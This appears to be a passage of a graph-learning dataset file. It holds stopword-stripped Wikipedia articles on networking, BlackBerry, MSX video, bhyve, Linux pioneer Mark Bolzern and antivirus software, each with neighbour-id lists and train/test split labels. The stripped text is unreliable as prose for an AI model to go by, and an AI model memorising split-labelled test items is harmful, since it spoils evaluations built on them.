802.1aq shortest path bridging spb spb allows shortest-path forwarding ethernet mesh network context utilizing multiple equal cost paths permits spb support large layer 2 topologies fast convergence improved use mesh topology combined single point provisioning logical connectivity membership is-is therefore augmented small number tlvs sub-tlvs supports two ethernet encapsulating data paths 802.1ad provider bridges 802.1ah provider backbone bridges spb requires state machine substantive changes is-is simply requires new network layer protocol identifier nlpid set tlvs extension is-is defined ietf proposed standard rfc 6329
[ 10752, 1030, 8211, 6681, 5149, 9245, 10271, 10274, 2085, 562, 3126, 1079, 3133, 11332, 9285, 8265, 1610, 9290, 4691, 10344, 9860, 3218, 11413, 5270, 8854, 152, 3742, 9381, 3751, 3752, 172, 10413, 686, 10924, 9909, 5816, 7865, 4797, 7360, ...
Validation
2,207
2
VoiceOver:voiceover voiceover screen reader built apple inc. macos ios tvos watchos ipod operating systems using voiceover user access macintosh ios device based spoken descriptions case mac keyboard feature designed increase accessibility blind low-vision users well users dyslexia voiceover first introduced mac os x 10.4 target users difficulty reading due vision impairment particularly blind preview also made available mac os x 10.3 panther titled spoken interface preview voiceover treats user interface hierarchy elements navigated various keystrokes elements also interacted with—for example interacting text box allows reading text possible editing interacting scroll bar allows moved using keyboard voiceover also includes support many braille displays blind deaf addition voiceover includes features use mouse keyboard-based navigation users macbooks magic trackpads number special multitouch features also available trackpad respond gestures much like ios version voiceover specific example using trackpad explore actual visual layout elements screen sliding one finger around trackpad activate elements mac os x 10.5 apple added alex voice offered improved quality speech human-like sound previously voices directly descended used apple speech manager originated early 1990s also alex voice natural breathing unlike voices apple mac os x 10.7 apple offered download realspeak voices nuance use voiceover accessibility inspector made verify accessibility os x applications displays information gui element currently cursor success macs apple added voiceover ipod shuffle assists users ipod shuffle controlling playback songs titles read 2010 revision ipod shuffle user also voiceover read playlists unlike voiceover os x voiceover marketed accessibility feature ipod shuffle voiceover intended used everyone disabled months later release iphone 3gs voiceover added ios ipod touch upgraded match hardware iphone 3gs ipod touch third generation also gained voiceover capability ipad since introduction also voiceover capability voiceover ios interacts user using various gestures different motions one makes one fingers display many gestures location-sensitive—for example sliding one finger around screen reveal visual contents screen finger passes enables blind users explore actual on-screen layout application user double-tap—similar double-clicking mouse—to activate selected element sighted user tapped item voiceover also turn display leave touch screen sensitive touch saving battery power apple calls feature screen curtain also available mac computers running os x. voiceover ios activated using settings application found accessibility section general section device also configured voiceover toggled triple-click home button device september 2009 apple launched feature ipod nano line uses many gestures ios version
[ 10755, 9732, 4615, 1549, 5647, 7697, 1042, 11289, 6186, 4139, 6700, 4657, 1074, 8754, 9784, 8253, 576, 9802, 8783, 5713, 4180, 3670, 1623, 3672, 4184, 10838, 2141, 4702, 3681, 9826, 2149, 8806, 3691, 8303, 2673, 6771, 2676, 6264, 7292, 26...
None
2,208
2
BlackBerry:blackberry blackberry line smartphones tablets services originally designed marketed canadian company blackberry limited formerly known research motion rim currently designed manufactured marketed tcl communication brand blackberry mobile bb merah putih optiemus infracom global indonesian south asian markets respectively using blackberry brand license blackberry one prominent smartphone vendors world specializing secure communications mobile productivity well-known keyboards devices peak september 2013 85 million blackberry subscribers worldwide however blackberry since lost dominant position market due success android ios platforms numbers fallen 23 million march 2016 blackberry line traditionally uses proprietary operating system developed blackberry limited known blackberry os 2013 blackberry introduced blackberry 10 major revamp platform based qnx operating system blackberry 10 meant replace aging blackberry os platform new system line user experiences modern smartphone operating systems first bb10 powered device blackberry z10 followed all-touch keyboard-equipped models including blackberry q10 blackberry classic blackberry z30 stereo speakers blackberry passport blackberry leap 2015 blackberry re-focused business strategy began release android-based smartphones beginning blackberry priv slider blackberry dtek50 september 28 2016 blackberry announced would cease designing phones favor licensing partners tcl communication became global licensee brand name blackberry mobile optiemus infracom name blackberry mobile india bb merah putih also serve licensees brand serving indian indonesian markets respectively february 2017 blackberry mobile released blackberry keyone known physical keyboard 4.5 inch screen great battery life last device designed blackberry limited blackberry mobile latest android smartphone blackberry key2 officially announced june 7 2018 released july 13th year us devices along bb merah purih blackberry aurora make blackberry current lineup june 2018 blackberry key2 launched international markets india licensee optiemus infracom key2 first blackberry-branded smartphone sport dual camera setup incorporates features portrait mode optical zoom august 2018 launch blackberry key2 optiemus infracom announced launch evolve evolve x smartphones indian market sold exclusively amazon india smartphones conceptualized designed manufactured india evolve series officially announced august 2 2018 research motion rim founded waterloo ontario first developed inter ctive pager 900 announced september 18 1996 inter ctive pager 900 clamshell-type device allowed two-way paging success 900 inter ctive pager 800 created ibm bought us 10 million worth february 4 1998 next device released inter ctive pager 950 august 26 1998 first device carry blackberry name blackberry 850 email pager released january 19 1999 although identical appearance 950 850 first device integrate email name inter ctive pager longer used brand device first blackberry device 850 introduced 1999 two-way pager munich germany name blackberry coined marketing company lexicon branding name chosen due resemblance keyboard buttons drupelets compose blackberry fruit original blackberry devices rim 850 857 used datatac network 2002 commonly known convergent smartphone blackberry released supports push email mobile telephone text messaging internet faxing web browsing wireless information services blackberry gained market share mobile industry concentrating email blackberry began offer email service non-blackberry devices palm treo proprietary blackberry connect software original blackberry device monochrome display newer models installed color displays newer models optimized thumbing use thumbs type keyboard storm 1 storm 2 include suretype keypad typing originally system navigation achieved use scroll wheel mounted right side device models prior 8700 trackwheel replaced trackball introduction pearl series allowed four-way scrolling trackball replaced optical trackpad introduction curve 8500 series models made use iden networks nextel southernlinc nii holdings mike also incorporate push-to-talk ptt feature similar two-way radio january 30 2013 blackberry announced release z10 q10 smartphones models consist touch screens z10 features all-touch design q10 combines qwerty keyboard touchscreen features second financial quarter 2013 blackberry sold 6.8 million handsets eclipsed sales competitor nokia lumia model first time august 12 2013 blackberry announced intention sell company due increasingly unfavourable financial position competition mobile industry largely due lower expected sales z10 blackberry announced september 20 2013 4,500 full- part-time positions estimated 40 operating staff terminated product line reduced six four models september 23 2013 fairfax financial owns 10 equity stake blackberry made offer acquire blackberry 4.7 billion 9.00 per share following announcement blackberry announced acceptance offer provisionally would continue seek offers november 4 2013 november 4 2013 blackberry replaced thorsten heins new interim ceo john s. chen former ceo sybase november 8 blackberry board rejected proposals several technology companies various blackberry assets grounds break-up serve interest stakeholders include employees customers suppliers addition shareholders said sources want identified discussions confidential november 13 2013 chen released open message committed reclaiming success early july 2014 techcrunch online publication published article titled blackberry one hottest stocks 2014 seriously following 50 percent rise company stock increase greater peer companies apple google however analysis blackberry financial results showed neither revenue profit margin improved instead costs markedly reduced period blackberry also introduced new passport handset — consisting square screen full hd-class 1,440 x 1,440 resolution marketed professional fields healthcare architecture — promoted messenger app released minor updates bb10 mobile operating system december 17 2014 blackberry classic introduced meant line former bold series incorporating navigation buttons similar previous blackberry os devices discontinued june 2016 last blackberry keyboard dominates front phone classic style september 2015 blackberry officially unveiled blackberry priv slider german made camera lens 18 megapixels phablet utilizes android operating system additional security productivity-oriented features inspired blackberry operating systems however blackberry coo marty beard told bloomberg company never said would build another bb10 device july 26 2016 company hinted another model physical keyboard coming shortly day blackberry unveiled mid-range android model on-screen keyboard blackberry dtek50 powered latest version android 6.0 marshmallow priv could also upgraded 6.0 device featured 5.2-inch full high-definition display blackberry chief security officer david kleidermacher stressed data security launch indicating model included built-in malware protection encryption user information industry observers pointed dtek50 re-branded version alcatel idol 4 additional security-oriented software customizations manufactured designed tcl september 2016 blackberry limited agreed licensing partnership indonesian company set new joint venture company called bb merah putih source distribute market blackberry handsets indonesia october 25 2016 blackberry released blackberry dtek60 second device dtek series manufactured designed tcl device features 5.5-inch quad-hd touch screen display running qualcomm snapdragon 820 processor support quick charge 3.0 usb type-c fingerprint sensor october 2016 announced blackberry working ford motor company canada develop software car manufacturer connected vehicles february 2017 20m class action lawsuit blackberry announced former employees company march 2017 bb merah putih announced blackberry aurora indonesian-made sold device running operating system based android 7.0 box march 2018 announced blackberry working jaguar land rover develop software car manufacturer vehicles june 2018 blackberry partnership tcl mobile optiemus infracom launched key2 global launch new york third device sport keyboard running google android os 2000 ntp sent notice wireless email patents number companies offered license patents ntp brought patent-infringement lawsuit one companies research motion united states district court eastern district virginia court well known strict adherence timetables deadlines sometimes referred rocket docket particularly efficient trying patent cases jury eventually found ntp patents valid furthermore jury established rim infringed patents willful manner infringement cost ntp us 33 million damages greater reasonable royalty lost profits judge james r. spencer increased damages us 53 million punitive measure due willful nature infringement also instructed rim pay ntp legal fees us 4.5 million issued injunction ordering rim cease desist infringing patents—this decision would resulted closure blackberry systems us rim appealed findings court injunction remedies stayed pending outcome appeals march 2005 appeal rim ntp tried negotiate settlement dispute settlement 450 million negotiations broke due issues june 10 2005 matter returned courts early november 2005 us department justice filed brief requesting rim service allowed continue large number blackberry users us federal government january 2006 us supreme court refused hear rim appeal holding liability patent infringement matter returned lower court prior granted injunction preventing rim sales us use blackberry device might enforced presiding district court judge two parties unable reach settlement february 9 2006 us department defense dod filed brief stating injunction shutting blackberry service excluding government users unworkable dod also stated blackberry crucial national security given large number government users february 9 2006 rim announced developed software workarounds would infringe ntp patents would implement injunction enforced march 3 2006 stern warning judge spencer rim ntp announced settled dispute terms settlement rim agreed pay ntp 612.5 million usd full final settlement claims statement rim said terms agreement finalized litigation rim dismissed court order afternoon agreement eliminates need court proceedings decisions relating damages injunctive relief settlement amount believed low analysts absence future royalties technology question may 26 2017 blackberry announced reached agreement qualcomm incorporated resolving amounts payable connection interim arbitration decision announced april 12 2017 following joint stipulation parties arbitration panel issued final award providing payment qualcomm blackberry total amount u.s. 940,000,000 including interest attorneys fees net certain royalties due blackberry calendar 2016 first quarter calendar 2017 november 24 2010 research motion rim removed kik messenger blackberry app world limited functionality software users rim also sued kik interactive patent infringement misuse trademarks october 2013 companies settled lawsuit terms undisclosed 2018 reported blackberry would filing legal action facebook perceived intellectual property infringements within facebook messenger whatsapp well instagram many blackberry retail stores operate outside north america thailand indonesia united arab emirates mexico december 2007 blackberry store opened farmington hills michigan store offers blackberry device models t-mobile verizon sprint major u.s. carriers offer smartphones three prior attempts opening blackberry stores toronto london uk eventually folded also blackberry stores operated wireless giant airports atlanta boston charlotte minneapolis–st paul philadelphia houston newark several slated closing september 23 2015 blackberry opened first pop-up store frankfurt germany various stages company history suffered occasional service outages referred media embarrassing 2005 company suffered relatively short-term outage reportedly among small handful north america carriers service restored several hours 2007 e-mail service suffered outage led calls questioning integrity towards blackberry perceived centralized system 2009 company outage reportedly covering whole north america 2011-10-10 10:00 utc began multi-day outage europe middle east africa affecting millions blackberry users another outage following day october 12 2011 blackberry internet service went north america research motion attributed data overload due switch failures two data centres waterloo canada slough england cause service disruptions outage intensified calls shareholders shake-up company leadership estimates blackberry company lost 50 million 54 million due global email service failure outage 2011 bcesa blackberry certified enterprise sales associate qualification first three levels professional blackberry certification information certifications blackberry.com website blackberry technical certifications available android devices blackberry 10 devices blackberry 7 devices blackberry 6 devices blackberry 5 devices blackberry 4 devices blackberry 3 devices blackberry 2 devices blackberry 1 devices modern lte based phones blackberry z10 qualcomm snapdragon s4 plus proprietary qualcomm soc based armv7-a architecture featuring two 1.5 ghz qualcomm krait cpu cores 400 mhz adreno 225 gpu gsm-based blackberry phones incorporate arm 7 9 11 processor blackberry models torch 9850/9860 torch 9810 bold 9900/9930 1.2 ghz msm8655 snapdragon s2 soc 768 mb system memory 8 gb on-board storage entry-level models curve 9360 feature marvell pxa940 clocked 800 mhz previous blackberry devices bold 9000 equipped intel xscale 624 mhz processors bold 9700 featured newer version bold 9000 processor clocked speed curve 8520 featured 512 mhz processor blackberry 8000 series smartphones 8700 pearl based 312 mhz arm xscale armv5te pxa900 exception blackberry 8707 based 80 mhz qualcomm 3250 chipset due pxa900 chipset supporting 3g networks 80 mhz processor blackberry 8707 meant device often slower download render web pages 3g 8700 edge networks early blackberry devices blackberry 950 used intel 80386-based processors blackberry latest flagship phone blackberry z30 based 5-inch super amoled 1280×720 resolution 295 ppi 24-bit color depth powered quad-graphics qualcomm dual core 1.7 ghz msm8960t pro first blackberry android operating system released late november 2015 192 gram/6.77 ounce blackberry priv launched version 5.1.1 later upgraded version 6.0 android marshmallow first available four countries increased 31 countries february 28 2016 employing qualcomm 8992 snapdragon 808 hexa-core 64 bit adreno 418 600 mhz gpu 3gb ram processor unit equipped curved 5.4-inch 2560 x 1440 oled display sliding qwerty keyboard hidden use google voice recognition allows dictating e-mails also available priv retained best blackberry 10 features 3,410mah battery said provide 22.5 hours mixed use 18-megapixel camera schneider-kreuznach lens also record 4k video secondary selfie camera also provided several important apps unique priv available google play mid december new operating system blackberry 10 released two new blackberry models z10 q10 january 30 2013 blackberry world 2012 rim ceo thorsten heins demonstrated new features os including camera able rewind frame-by-frame separately individual faces image allow selection best different shots stitched seamlessly optimal composite intelligent predictive adapting keyboard gesture based user interface designed around idea peek flow apps available blackberry 10 devices blackberry world storefront previous operating system developed older blackberry devices blackberry os proprietary multitasking environment developed rim operating system designed use input devices track wheel track ball track pad os provides support java midp 1.0 wap 1.2 previous versions allowed wireless synchronisation microsoft exchange server email calendar well lotus domino email os 5.0 provides subset midp 2.0 allows complete wireless activation synchronisation exchange email calendar tasks notes contacts adds support novell groupwise lotus notes blackberry curve 9360 blackberry torch 9810 bold 9900/9930 curve 9310/9320 torch 9850/9860 featured 2011 blackberry os 7 apps available devices blackberry world 2013 called blackberry app world third-party developers write software using apis proprietary blackberry apis well application makes use certain restricted functionality must digitally signed associated developer account rim signing procedure guarantees authorship application guarantee quality security code rim provides tools developing applications themes blackberry applications themes loaded onto blackberry devices blackberry world air ota blackberry mobile browser blackberry desktop manager blackberry devices well android ios windows phone platforms ability use proprietary blackberry messenger also known bbm software sending receiving encrypted instant messages voice notes images videos via blackberry pin long cell phone data plan messages free charge features bbm include groups bar-code scanning lists shared calendars bbm music integration apps games using bbm social platform april 2013 blackberry announced shutting streaming music service bbm music active almost two years since launch blackberry messenger music closed june 2 2013 july 2014 blackberry revealed blackberry assistant new feature blackberry os 10.3 blackberry passport hardware feature digital personal assistant help keep organized informed productive december 2014 blackberry nanthealth healthcare-focused data provider launched secure cancer genome browser giving doctors ability access patients genetic data blackberry passport smartphone several non-blackberry mobile phones released featuring blackberry email client connects blackberry servers many phones full qwerty keyboards third-party software available use blackberry devices includes full-featured database management systems used support customer relationship management clients applications must manage large volumes potentially complex data march 2011 rim announced optional android player could play applications developed android system would available blackberry playbook rim first entry tablet market august 24 2011 bloomberg news reported unofficial rumors blackberry devices would able run android applications rim brings qnx android app player blackberry october 20 2011 rim officially announced android applications could run unmodified blackberry tablet newest blackberry phones using newest version operating system blackberry smartphones integrated organization email system software package called blackberry enterprise server bes version 5 blackberry enterprise service bes version 10 versions 6 9. versions bes available microsoft exchange lotus domino novell groupwise google apps individual users may able use wireless provider email services without install bes organizations multiple users usually run bes network blackberry devices running blackberry os 10 later also managed directly microsoft exchange server using exchange activesync eas policies way ios android device eas supports fewer management controls bes third-party companies provide hosted bes solutions every blackberry unique id called blackberry pin used identify device bes blackberry one time provided free bes software called bes express besx primary bes feature relay email corporate mailbox blackberry phone bes monitors user mailbox relaying new messages phone via blackberry network operations center noc user wireless provider feature known push email new emails contacts task entries memopad entries calendar entries pushed blackberry device immediately opposed user synchronising data manually device poll server intervals blackberry also supports polling email third-party applications messaging system built blackberry understands receive messages bes bis services handle connections user mail providers device storage also enables mobile user access data off-line areas without wireless service user reconnects wireless service bes sends latest data feature newer models blackberry ability quickly track user current location trilateration without use gps thus saving battery life time trilateration used quick less battery intensive way provide location-aware applications co-ordinates user however accuracy blackberry trilateration less gps due number factors including cell tower blockage large buildings mountains distance bes also provides phones tcp/ip connectivity accessed component called mds mobile data system connection service allows custom application development using data streams blackberry devices based sun microsystems java platform addition bes provides network security form triple des recently aes encryption data email mds traffic travels blackberry phone blackberry enterprise server providers offer flat monthly pricing via special blackberry tariffs unlimited data blackberry units bes addition receiving email organizations make intranets custom internal applications unmetered traffic recent versions blackberry platform mds longer requirement wireless data access starting os 3.8 4.0 blackberry phones access internet i.e tcp/ip access without mds – formerly email wap access possible without bes/mds bes/mds still required secure email data access applications require wap carriers allow wap access primary alternative using blackberry enterprise server use blackberry internet service bis blackberry internet service available 91 countries internationally blackberry internet service developed primarily average consumer rather business consumer service allows users access pop3 imap outlook web app via exchange activesync email accounts without connecting blackberry enterprise server bes blackberry internet service allows 10 email accounts accessed including proprietary well public email accounts gmail outlook yahoo aol blackberry internet service also supports push capabilities various blackberry applications various applications developed rim blackberry utilise push capabilities bis instant messaging clients like google talk windows live messenger yahoo messenger mms pin interactive gaming mapping trading applications require data plans like bis wi-fi use service usually provisioned mobile phone service provider though blackberry actually runs service blackberry pin personal identification number eight-character hexadecimal identification number assigned blackberry device pins changed manually device though blackberry technicians able reset update pin server-side locked specific blackberry blackberry devices message using pin directly using blackberry messenger application blackberry pins tracked blackberry enterprise servers blackberry internet service used direct messages blackberry device emails messages blackberry push service typically directed blackberry device pin message routed rim network operations center sent carrier deliver message last mile device september 2012 rim announced blackberry pin would replaced users blackberry id starting 2013 launch blackberry 10 platform primary competitors blackberry android smartphones iphone blackberry struggled compete market share plunged since 2011 leading speculation unable survive independent going concern however managed maintain significant positions markets despite market share loss global basis number active blackberry subscribers increased substantially years example fiscal period apple iphone first released rim reported subscriber base 10.5 million blackberry subscribers end 2008 android first hit market rim reported number blackberry subscribers increased 21 million finally quarter ended june 28 2012 rim announced number blackberry subscribers reached 78 million globally release apple iphone 5 september 2012 rim ceo thorsten heins announced current global subscribers 80 million sparked 7 jump shares price however since blackberry global user base meaning active accounts declined dramatically since peak 80 million june 2012 dropping 46 million users september 2014 market share globally also declined less 1 percent 2011 blackberry shipped 43 smartphones indonesia april 2014 fallen 3 decline indonesian market share mirrors global trend company 0.6 north america retail price 2,199,000 indonesian rupiah 189 failed give blackberry boost needed indonesia company launched device discounted offer first 1000 purchasers resulted stampede capital several people injured blackberry lost market share indonesia despite launch z3 may 13 2014 new device given worldwide launch city jakarta came back news research motion rim cut hardware production costs outsourcing taiwan-based foxconn group report third quarter 2015 results december 18 2015 company said approximately 700,000 handsets sold 1.9 million quarter 2014 800,000 q2 2015 average sale price per unit 240 315 however continue increase sales new android priv device selling premium price 800 canada example q3 2015 blackberry net loss 89 million u.s. 17 cents per share 15 million net loss three cents per share excluding restructuring charges one-time items revenue slightly year earlier 557 million u.s. vs. 548 million primarily software sales chief executive officer john chen said expects company software business grow 14 percent market time company ready provide sales figures android-based priv handset released weeks earlier four countries time chen offered comment analysts depending priv ... chance could achieve get closer break-even operating profitability overall device business fourth quarter due continuous reduction blackberry users february 2016 blackberry headquarter waterloo canada slashed 35 percent workforce early 2016 blackberry market share dropped 0.2 q4 2016 reports indicate blackberry sold 207,900 units—equivalent 0.0 market share number active blackberry users since 2003 globally research motion agreed give access private communications governments united arab emirates saudi arabia 2010 india 2012 saudi uae governments threatened ban certain services law enforcement agencies could decrypt messages people interest revealed part 2013 mass surveillance disclosures american british intelligence agencies national security agency nsa government communications headquarters gchq respectively access user data blackberry devices agencies able read almost smartphone information including sms location e-mails notes blackberry internet service operates outside corporate networks contrast data passing internal blackberry services bes compresses encrypt data documents stated nsa able access blackberry e-mail system could see read sms traffic brief period 2009 nsa unable access blackberry devices blackberry changed way compress data access devices re-established gchq gchq tool named scrapheap challenge capability perfect spoofing emails blackberry targets response revelations blackberry officials stated us comment media reports regarding alleged government surveillance telecommunications traffic added back door pipeline platform established exist similar access intelligence agencies mobile devices exists using similar techniques hack blackberry software includes support dual ec drbg csprng algorithm due probably backdoored nsa us national institute standards technology strongly recommends longer used blackberry ltd. however issued advisory customers consider probable backdoor vulnerability blackberry ltd. also owns us patent 2007189527 covers technical design backdoor formerly advanced encryption capabilities blackberry smartphone made eligible use government agencies state forces former united states president barack obama became known dependence blackberry device communication 2008 presidential campaign despite security issues insisted using even inauguration seen akin celebrity endorsement marketing experts estimated worth 25 million 50 million usage blackberry continued around end presidency hillary clinton email controversy associated hillary clinton continuing use blackberry assuming office secretary state example west yorkshire police allowed increase presence police officers along streets reduction public spending given officer could perform desk work directly via mobile device well several areas situations us federal government slow move away blackberry platform state department spokesperson saying 2013 blackberry devices still mobile devices approved u.s. missions abroad state department high encryption standard made blackberry smartphones playbook tablet unique since implemented devices including apple devices released iphone 4 bangalore city police one police departments india along pune police kochi police use blackberry devices united kingdom south west trains northern rail issued blackberry devices guards order improve communication control guards passengers canada toronto many municipalities within canada issued blackberry devices employees including limited transportation technical water operations inspection staff management staff order improve communication contracted construction companies winter maintenance operations assist successfully organize multimillion-dollar contracts devices standard mobile device receive e-mail redirected groupwise city e-mail environment currently set support blackberry devices part internet things endeavours company announced plans moving shipping industry adapting smartphones devices communication necessities freight containers eric schmidt executive chairman google longtime blackberry user although smartphones running google android mobile operating system compete blackberry schmidt said 2013 interview uses blackberry prefers keyboard italian criminal group known 'ndrangheta reported february 2009 communicated overseas gulf cartel mexican drug cartel use blackberry messenger since bbm texts difficult intercept
[ 9732, 1930, 9101, 9360, 2449, 10645, 278, 7447, 7958, 8472, 410, 3610, 5531, 798, 5024, 420, 6692, 10660, 11175, 554, 7983, 8367, 690, 3634, 5810, 2361, 9913, 1083, 6271, 9408, 7489, 9665, 8003, 2502, 5063, 4041, 2892, 77, 5069, 7887, 3...
Test
2,209
3
MSX_Video_access_method:msx video access method colecovision sg-1000 creativision first-generation msx computers use tms9918a video display processor vdp 16 kib video memory shared main memory compared unified system video memory used 8-bit computers time apple ii zx spectrum commodore 64 separate memory advantage freeing z80 processor 64 kib address space main ram vdp n't need steal cpu cycles access video memory disadvantage program use cpu dedicated i/o instructions command vdp manipulate contents video ram slows video access also makes porting games unified-memory platforms difficult attempts porting zx spectrum games uk system similar msx often thwarted difference also programmers learn optimally use advanced capabilities vdp tms9918a method accessing video ram slower direct access used unified-memory computers accessing video memory involved first outputting low- hi-byte 14-bit video memory address i/o port 99 one bytes 8-bit data port 98 write memory pointer advances next address consecutive addresses written repeated instructions 98 z80 fast otir/otdr block instructions could used instead ldir/lddr still allowed vram access rate restricted unless vertical blanking however screen layout top-down character 8 lines advancing next character difficult use programmers tried convert existing software originally written system another arrangement screen layout trying use tms9918a high resolution mode video memory conventional way method indirect-access could far slower 8-bit computers unified memory like piece ram consequently machines using vdp could inefficient certain graphical tasks scrolling games entailed moving entire background memory instead able use z80 efficient fast block move instructions write elaborate routines first read bytes video memory system memory back another location video memory one byte time increase speed acceptable level programmers often limited scrolling 8-pixel steps looked primitive comparison 1 2 pixel scrolling steps available zx spectrum commodore 64 machines although commodore 64 also used 8-pixel steps fine-scroll register could compensate msx-1 tms9918a several features make shortfall example programmable character set allowed indirection greatly increase scrolling character table moved instead pixel data 32 hardware sprites sprites however limited example atari-8-bit systems highest resolution 16x16 pixels single-color transparency bigger drawback though reality scan line segments maximum 4 sprites could simultaneously displayed one picture scan line attempting place 5-th sprites scan line segment scan line four others would result flickering missing scan line segments still care multiple multi-color sprites could created way many japanese games prove zx spectrum sprites porting games often much trouble re-write game structure take advantage sprites often simply ignored porting games tricks available circumvent scrolling speed related problems using clever programming techniques video chip capabilities available zx spectrum using undocumented text mode supported multiple colors addition using built re-programmable fonts possible combine high resolution graphics faster scrolling also able use sprites method widely used japanese programmers writing native software rarely british programmers porting spectrum software video problems described especially sprite limits scrolling fixed newer msx-2 video chips however time 16 bit systems like amiga atari st started dominate market
[ 1403, 9006 ]
Validation
2,210
3
Degree_of_parallelism:degree parallelism degree parallelism dop metric indicates many operations simultaneously executed computer especially useful describing performance parallel programs multi-processor systems program running parallel computer may utilize different numbers processors different times time period number processors used execute program defined degree parallelism plot dop function time given program called parallelism profile
[ 785, 7699, 7963, 6815, 5798, 9126, 6184, 2345, 4909, 7218, 8501, 5948, 4286, 2113, 8514, 5956, 4423, 1480, 1866, 8523, 4308, 344, 2264, 731, 2140, 11487, 4194, 5090, 7142, 1267, 7802, 508, 3197, 8447 ]
Validation
2,211
2
Mark_Bolzern:mark bolzern mark bolzern one original pioneers internet linux computer operating system bolzern founder early linux-specific community portals linuxnews linuxmall linuxpro linuxguru penguinpower bolzern also creator original plush tux mascot based original drawing larry ewing work linuxmall allowed bolzern directly affect linux community linuxmall support various linux events achievements play significant role story book rebel code author glyn moody bolzern graduated 1976 west anchorage high school among things first worked monroe 1880 programmed via graphite marked cards octal started fascination computers later bolzern attended uaa university alaska anchorage studies late 1970s helped test early statewide multi-campus e-mail system short year cal poly pomona california polytechnic state university transferred uaf university alaska fairbanks studied electrical engineering also played data general nova computer system used development alohanet low level error correcting packet protocols csma/cd pioneered fundamental underlying protocols tcp/ip ethernet wifi internet denied access administrators bolzern cracked university alaska statewide computer network 1978 something n't think possible standard user used central honeywell 66 fairbanks send emails system users inviting use software participate apple ii user group via early shared account created set group communication via mailx mail extended enhanced version standard unix command mail extended features bolzern able use create one first bulletin board systems bbs history apple access terminal emulation etc performed free via software called uacncap written distributed bolzern associate made apple ii original model hayes 300 baud modem remote terminal gcos system later ibm pc version called pc communicator bolzern pc-talk released well gcos early variant unix field linux user full name goes called gcos field bolzern also used software continue accessing system third-floor lathrop hall dorm room via wires one phone entire floor hall also anywhere else happened apple ii hayes modem well communicate family back home via email continued graduation 1981 bachelor science electrical engineering bolzern created uaf soon became used university teachers students years thereafter uaf bolzern worked motorola installer radio technician graduation took job ibm scoring second highest anyone else hired year qualification exams ibm quickly learned repair office equipment ibm time influential recognizing value desktop pc ultimately ibm management support resigned ibm moved sales new machines computerland sold first 50 pcs delivered within state alaska general computer services inc. gcs founded 1981 incorporated september 17 1982 bolzern ’ consulting company anything everything pc-related created commercial job cost estimating software created early isp internet service provider state alaska time founded anchorage pc compatibles user group later became alaska computer society also “ computer talk ” world ’ first far know radio talk show computers moving aurora colorado bolzern worked advised colorado department education built statewide legislation notification system helped get computers public school system uswest unix informix sql database systems accounting information management also travelled speaker many topics related computers early 90 ’ linux born bolzern soon became one outspoken advocates development adoption wgs work group solutions founded aurora colorado june 23 1993 originally subsidiary gcs big/main achievement introducing first commercially-sold software linux flagship clipper compiler unix shortly thereafter linuxpro linuxpro one better known distributions distros early years linux even winning best comdex award 1995 presented noted science fiction writer jerry pournelle wgs shortly thereafter received letter stating company sued using word linux mental patient trademarked linus torvalds said wanted word linux freely available anyone unfortunately could achieved non-profit group administer phil hughes linux journal john maddog hall digital equipment corp bolzern among others assembled group fight lawsuit eventually settled outright giving trademark directly linus torvalds agreement li linux international would manage john maddog hall bolzern made sure trademark put linus name agreement made linux international li perpetual administrator linux international since morphed linux foundation late 1995 bolzern founded colorado linux users enthusiasts clue bringing local high school students aurora co businesses interested linux together others used linux presented many topics activities included linux install fests allowing new users learn linux various distros available along power open source programs specifically linux may june 1998 articles bolzern wrote published regarding linux base system project commenting growth linux community wgs transitioned linuxmall 1996 2000 firm 60 employees based aurora colorado largest online shopping center software products linux computer operating system expected initial public offering stock market downturn led instead reverse acquisition bought 25 million ebiz enterprises already-publicly listed firm change name linuxmall.com transaction april march 2000 several articles published microsoft relation linux several penned bolzern addition penguinpower name many collectables designed bolzern manufactured linuxmall tux pin worn peter h. salus unfortunately growth linuxmall cut short early 2000s bursting tech bubble non-delivery 10 million dollar check vcs said already mail subsequent merger activities bolzern semi-retired travel take care wife virginia stricken cancer february 2012 mark bolzern serves chief technical officer northern utility services llc anchorage alaska originally grew autobiographical page also details regarding mark professional achievements bolzern ’ involvement ultimately became linux foundation significant work includes li bolzern initially structured vendor organization responsible lsb linux standard base lpi linux professional institute professional linux certification linux trademark administration among things born zurich switzerland bolzern family father mother mark arrived spain via ship along vw bus immigrating via ellis island permanently closed bolzern family arrived alaska via florida texas california brother ronald born waiting alaska highway open arrived anchorage 1962 prior famous 1964 earthquake naturalized u.s. citizen along parents june 17 1966 bolzern spent several years limelight traveling caring wife virginia dealing breast cancer death march 8 2007 time involved encouragement ministry called bbtj
[ 2785, 1192, 4011, 7983, 6352, 11153, 9459, 5492, 5531, 823, 3323 ]
None
2,212
2
Bhyve:bhyve bhyve pronounced bee hive formerly written bhyve type-2 hypervisor written freebsd ported number illumos based distributions including smartos omnios bhyve runs freebsd 9+ openbsd netbsd linux illumos windows nt windows vista later windows server 2008 later guests current development efforts aim widening support operating systems x86-64 architecture
[ 6150, 10761, 2058, 3082, 4636, 1071, 7733, 9784, 5177, 5697, 5702, 8266, 5710, 7248, 7249, 9306, 607, 10851, 8816, 9844, 9343, 2180, 4238, 684, 3248, 7349, 1718, 5819, 2236, 11459, 9927, 8395, 8909, 6864, 10455, 6361, 8410, 5356, 11506, 8...
Test
2,213
4
Antivirus_software:antivirus software antivirus software anti-virus software abbreviated av software also known anti-malware computer program used prevent detect remove malware antivirus software originally developed detect remove computer viruses hence name however proliferation kinds malware antivirus software started provide protection computer threats particular modern antivirus software protect users malicious browser helper objects bhos browser hijackers ransomware keyloggers backdoors rootkits trojan horses worms malicious lsps dialers fraudtools adware spyware products also include protection computer threats infected malicious urls spam scam phishing attacks online identity privacy online banking attacks social engineering techniques advanced persistent threat apt botnet ddos attacks although roots computer virus date back early 1949 hungarian scientist john von neumann published theory self-reproducing automata first known computer virus appeared 1971 dubbed creeper virus computer virus infected digital equipment corporation dec pdp-10 mainframe computers running tenex operating system creeper virus eventually deleted program created ray tomlinson known reaper people consider reaper first antivirus software ever written – may case important note reaper actually virus specifically designed remove creeper virus creeper virus followed several viruses first known appeared wild elk cloner 1981 infected apple ii computers 1983 term computer virus coined fred cohen one first ever published academic papers computer viruses cohen used term computer virus describe program affect computer programs modifying way include possibly evolved copy note recent precise definition computer virus given hungarian security researcher péter szőr code recursively replicates possibly evolved copy first ibm pc compatible wild computer virus one first real widespread infections brain 1986 number viruses grown exponentially computer viruses written early mid-1980s limited self-reproduction specific damage routine built code changed programmers became acquainted computer virus programming created viruses manipulated even destroyed data infected computers internet connectivity widespread computer viruses typically spread infected floppy disks antivirus software came use updated relatively infrequently time virus checkers essentially check executable files boot sectors floppy 